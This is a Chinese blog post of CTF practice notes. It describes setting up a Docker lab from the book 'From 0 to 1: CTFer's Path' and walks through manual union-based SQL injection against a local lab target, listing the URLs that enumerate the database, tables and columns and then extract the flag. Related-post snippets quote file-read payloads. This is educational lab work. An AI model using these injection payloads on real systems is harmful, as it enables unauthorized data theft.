《从0到1:CTFer成长之路》靶场练习手记02

最新推荐文章于 2023-10-26 19:07:02 发布
原创 最新推荐文章于 2023-10-26 19:07:02 发布 · 4.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ubuntu #运维 #web安全

本文介绍了如何在Windows 10环境下通过VMware和Ubuntu搭建CTF靶场,并利用Docker运行多个容器。在Ubuntu中,当运行多个docker-compose时,会生成虚拟网卡地址,可以通过`docker inspect`命令获取容器IP。博客详细展示了SQL注入的手工测试过程,包括爆库、爆表、爆列和爆值等步骤,同时也提到了可以使用sqlmap工具自动化这些过程。

靶场环境win10+VM+ubuntu+docker

靶场环境搭建见笔者上篇手记

《从0到1:CTFer成长之路》靶场练习手记_X_python321的博客-优快云博客

注意事项

Ubuntu里面开了多个docker-compose的时候会生成虚拟网卡地址

容器ID可以使用docker ps -a查看,根据下面命令查看具体IP

docker inspect 容器ID | grep IPAddress

docker-compose起来之后使用浏览器访问IP地址

火狐浏览器使用hackebar插件进行手注

 

http://172.20.0.1/index.php?id=1' and 1=2 -- -

 

http://172.20.0.1/index.php?id=-1' union select 1,2,3  -- -

 爆库

http://172.20.0.1/index.php?id=-1' union select 1,database(),3  -- -

 爆表

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note' -- -

爆列

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g' -- -

 爆值

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(fllllag),3 from fl4g  -- -

 

 

以上SQL手工注入wp

嫌麻烦的同学可以交给热心的 sqlmap 一把梭

3ize0f
关注
《从01:CTFer成长之路》靶场练习手记
X_python321的博客
03-07 1489
第一章 web入门 环境:主机Win10+VM 12 pro+Ubuntu 20 VM安装包链接 链接:https://pan.baidu.com/s/159zcAsCSctaz_TmrrEribg 提取码:riiq licence可自行百度 Ubuntu 的镜像可以从阿里的开源镜像站下载 阿里巴巴开源镜像站-OPSX镜像站-阿里云开发者社区 注意事项1:VM安装Ubuntu的时候选择配置尽量大一点,笔者第一次安装时选择的配置是1G内存 11处理器(这个是安装时系统默认推荐的配置),可以正
《从01CTFer成长之路》--afr_1 BUUCTF
wuyaowangchuan的博客
11-17 4199
任意文件读取漏洞 发现了?p=hello,然后页面回显了hello world 因为提示了是文件读取漏洞 没有回显 因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀 php的filter读取一下 ?p=php://filter/read=convert.base64-encode/resource=flag PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 base64解码 n1book{afr_1_solv.
01CTFer成长之路-第一章-CTF中的SQL注入
黑白的博客
03-01 2084
CTF中的SQL注入 声明 好好向大佬们学习!!! 攻击 https://book.nu1l.com/tasks/#/pages/web/1.2 SQL注入-1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 开启docker .
《从01CTFer成长之路》
WEB渗透测试 从入门到萌新
04-12 1926
一、判断注入类型 二、猜解列名数量(字段数) ?id=1' order by 1%23 发现4,页面不正常,所以字段数为1,2,3 三、查看报错位(报错位:2和3) ?id=123' union select 1,2,3 %23 四、信息收集 1、数据库名称:database() 得到数据库名称:note 2、表的信息 ?id=123' union select 1,database(),group_concat(table_name) from information.
《从01CTFer成长之路》afr_3
ZhShy
01-16 1480
文章目录靶场:afr_3知识点解题过程flag:n1book{afr_3_solved} 靶场:afr_3 知识点 /proc目录 flask之ssti模板注入 flask-session-cookie-manager burpsuite抓包 解题过程 检查首页,在输入框随便输入,并根据引导进入下一个页面 查看URL: http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article 通过
01CTFer成长之路死亡ping命令
一个努力学习网安的小牛马
10-26 529
死亡ping命令
Burp suite靶场SSRF练习(1)-持续更新中
09-09
1. 靶场SSRF练习概览: - 练习通过一系列的SSRF挑战,逐步深入理解和掌握SSRF攻击的手法。 - 每一个挑战都被设计为引导学习者如何发现和利用SSRF漏洞。 2. 第一题解析: - 目标是删除指定用户"carlos",该用户...
练习二:靶场练习(xss-labs)
最新发布
07-16
靶场练习”指的是一个模拟真实网络环境的平台,它提供了一系列的挑战和练习场景,让学习者能够在没有真实风险的条件下实践网络攻击和防御技能。通过靶场练习,学习者可以加深对XSS攻击原理和防御方法的理解,提高...
01 ctfer: SQL注入-2
Zeker62的博客
08-31 2057
分析这个靶场 : 登录靶场,只有一个空空的界面: 很明显,这是一个登录到账号密码的关于SQL注入的题目 尝试输入admin和其他用户名,发现是不一样的报错: 说明这里的机制是:先检查账号是否存在,再检查账号和密码是否对应 由此可以使用burpsuite抓包进行报错注入的操作: 经过抓包,在burp上显示不同的内容: “账号不存在” “账号和密码错误” 所以由此可以判断出,账号密码是否正确,来源于报错: 用户名正确报错:{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5
01CTFer成长之路——1git(全网最详细)
m0_52555753的博客
11-15 1510
网络安全
01CTFer成长之路
自然语言处理
10-03 982
作者:Nu1L战队 出版社:电子工业出版社 品牌:电子工业出版社 出版时间:2020-10-0101CTFer成长之路(精装版)
《从01CTFer成长之路》书籍配套题目-[第二章 web进阶]文件上传
weixin_46703850的博客
02-24 3319
[第二章 web进阶]文件上传开始行动绕过第1个限制绕过第2个限制 介绍:记录一下笔记,方便以后迅速回忆使用。 《从01CTFer成长之路》书籍配套题目,来源网站:《从01CTFer成长之路》 先看一下题目源码: <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo '
《从01CTFer成长之路》2.1 SSRF漏洞
ZhShy
01-15 5086
文章目录2.1.1 SSRF的原理解析2.1.2 SSRF漏洞的寻找和测试2.1.3 SSRF漏洞攻击方式2.1.3.1 内部服务资产探测2.1.3.2 使用Gopher协议扩展攻击面1. 攻击Redis2. 攻击MySQL3. PHP-FPM攻击4. 攻击内网中的脆弱web应用 SSRF(Server Side Request Forgery,服务端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞。因为请求是由内部发起的,所以一般情况下,SSRF漏洞攻击的目标往往是从外网无法访问的内部系
01——CTFer成长之路(三)
youngerll的博客
03-09 1004
01——CTFer成长之路(三)SSRF漏洞SSRF Training命令执行漏洞死亡ping命令XSS的魔力XSS闯关web文件上传漏洞文件上传 第二章 web进阶 SSRF漏洞 SSRF Training 命令执行漏洞 死亡ping命令 XSS的魔力 XSS闯关 web文件上传漏洞 文件上传 ...
《从01CTFer成长之路》常见的搜集
ZhShy
01-09 980
靶场:常见的搜集 i春秋 《从01CTFer成长之路》 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZXsmEizs-1641736502750)( 知识点 dirsearch 下载: ┌──(root????kali)-[/tools] └─# git clone git://github.com/maurosoria/dirsearch.git 扫描: ┌──(root????kali)-[/tools/dirsearch] └─# python3 dirs
《从01CTFer成长之路》1.3 任意文件读取漏洞
ZhShy
01-12 5133
文章目录1.3.1 文件读取漏洞常见触发点1.3.1.1 web语言1. PHP2.python3.Java4.Ruby5.Node1.3.1.2 中间件、服务件相关1.Nginx错误配置2.数据库3.软链接4.FFmpeg5.Docker-API1.3.1.3 客户端相关1.浏览器/Flash XSS2.MarkDown语法解析器XSS1.3.2 文件读取漏洞常见读取路径1.3.2.1 Linux1.flag名称(相对路径)2.服务器信息(绝对路径)1.3.2.2 Windows 1.3.1 文件读取漏洞
《从01CTFer成长之路》粗心的小李
tr_trTTT的博客
04-02 3100
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 这边给了提示,是吧git放到了外网环境,直接扫一下目录吧,查找一下git目录 git目录下是有东西的 所以我们可以利用工具GitHack或者Git_Extract-master把泄露的内容下载下来 下载下来的文件就会在这边 直接打开就可以看到flag n1book{git_looks_s0_easyfun} ...
01——CTFer成长之路(一)
youngerll的博客
03-08 5146
这里写自定义目录标题从01——CTFer成长之路(一)Docker安装 从01——CTFer成长之路(一) 此书将习题放在docker上,想做习题要先布置docker环境。 Docker安装 Windows商业版可以直接安装,懒得做系统,家庭版可以在VM虚拟机中直接安装。 下载ubuntu20系统及VM15; 安装docker。 ubuntu系统安装: 1.选择英语可以避免后期安装软件改文路径名称。 2.接着是漫长的等待; 3.等待完,右键桌面打开终端。 4.docker安装 ①终端apt
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值